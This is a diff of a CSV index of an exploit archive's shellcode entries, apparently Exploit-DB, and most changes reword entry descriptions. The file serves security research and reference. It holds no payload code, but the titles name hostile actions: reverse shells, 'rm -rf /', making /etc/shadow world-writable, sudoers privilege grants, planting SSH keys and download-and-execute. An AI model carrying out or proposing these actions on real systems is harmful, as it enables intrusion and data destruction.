 13286,platforms/generator/shellcode/13286.c,"Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",generator,shellcode,0
 13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,generator,shellcode,0
 13289,platforms/generator/shellcode/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0
 13290,platforms/ios/shellcode/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
-13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
+13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
 13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0
 13297,platforms/generator/shellcode/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,generator,shellcode,0
 13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
-13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
+13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]); Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
 13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0
 13301,platforms/linux_ppc/shellcode/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
 13302,platforms/linux_ppc/shellcode/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
@ -15831,9 +15833,9 @@ id,file,description,date,author,platform,type,port
 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0
 13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
-13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
+13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
-13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
+13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
-13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
+13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
 13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0
 13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
 13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
@ -15848,28 +15850,28 @@ id,file,description,date,author,platform,type,port
 13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0
 13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
 13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
-13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - File Reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0
+13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0
 13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0
 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0
 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0
 13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,generator,shellcode,0
 13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
 13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
-13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
+13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
-13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
+13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
 13333,platforms/lin_x86/shellcode/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0
 13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0
 13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0
-13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0
+13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0
 13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
 13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0
 13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
 13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
-13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0
+13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0
 13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0
-13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - raw-socket ICMP/checksum shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0
+13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0
-13344,platforms/lin_x86/shellcode/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0
+13344,platforms/lin_x86/shellcode/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0
-13345,platforms/lin_x86/shellcode/13345.c,"Linux/x86 - kill all processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0
+13345,platforms/lin_x86/shellcode/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0
 13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0
 13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
@ -15879,10 +15881,10 @@ id,file,description,date,author,platform,type,port
 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13353,platforms/lin_x86/shellcode/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0
 13354,platforms/lin_x86/shellcode/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0
-13355,platforms/lin_x86/shellcode/13355.c,"Linux/x86 - HTTP/1.x GET + Downloads + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode,0
+13355,platforms/lin_x86/shellcode/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode,0
 13356,platforms/lin_x86/shellcode/13356.c,"Linux/x86 - setreuid + executes command (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode,0
 13357,platforms/lin_x86/shellcode/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
-13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - re-use of /bin/sh string in .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
+13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
 13359,platforms/lin_x86/shellcode/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
 13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
 13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0
@ -15891,12 +15893,12 @@ id,file,description,date,author,platform,type,port
 13364,platforms/generator/shellcode/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",generator,shellcode,0
 13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0
 13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0
-13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + .ZIP Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
+13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
-13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + .RTF Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0
+13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0
-13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + .RIFF Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
+13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
-13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + .BMP Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0
+13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0
-13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - Read SWAP write to /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
+13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
-13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
+13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
 13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
 13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
 13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
@ -15904,8 +15906,8 @@ id,file,description,date,author,platform,type,port
 13377,platforms/lin_x86/shellcode/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
 13378,platforms/lin_x86/shellcode/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
 13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
-13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0
+13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0
-13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Null-Free Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0
+13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0
 13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0
 13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0
 13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0
@ -15914,11 +15916,11 @@ id,file,description,date,author,platform,type,port
 13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13397,platforms/lin_x86/shellcode/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,lin_x86,shellcode,0
@ -15926,16 +15928,16 @@ id,file,description,date,author,platform,type,port
 13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13401,platforms/generator/shellcode/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,generator,shellcode,0
-13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0
+13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0
 13403,platforms/lin_x86/shellcode/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
 13404,platforms/lin_x86/shellcode/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
 13405,platforms/lin_x86/shellcode/13405.c,"Linux/x86 - _exit(1); Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
 13406,platforms/lin_x86/shellcode/13406.c,"Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
 13407,platforms/lin_x86/shellcode/13407.c,"Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
-13408,platforms/lin_x86/shellcode/13408.c,"Linux/x86 - snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode,0
+13408,platforms/lin_x86/shellcode/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode,0
 13409,platforms/lin_x86/shellcode/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,lin_x86,shellcode,0
-13410,platforms/lin_x86/shellcode/13410.s,"Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (.s) (187+ bytes)",2005-09-09,xort,lin_x86,shellcode,0
+13410,platforms/lin_x86/shellcode/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes)",2005-09-09,xort,lin_x86,shellcode,0
-13411,platforms/lin_x86/shellcode/13411.c,"Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (187+ bytes)",2005-09-08,xort,lin_x86,shellcode,0
+13411,platforms/lin_x86/shellcode/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes)",2005-09-08,xort,lin_x86,shellcode,0
 13412,platforms/lin_x86/shellcode/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,lin_x86,shellcode,0
 13413,platforms/lin_x86/shellcode/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,lin_x86,shellcode,0
 13414,platforms/lin_x86/shellcode/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,lin_x86,shellcode,0
@ -15944,28 +15946,28 @@ id,file,description,date,author,platform,type,port
 13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0
 13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0
 13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0
-13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0
+13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0
-13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0
+13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 -  Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0
 13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0
 13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0
 13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
-13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0
+13425,platforms/lin_x86/shellcode/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0
 13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
 13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0
 13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
 13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
-13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0
+13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0
 13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0
-13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0
+13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0
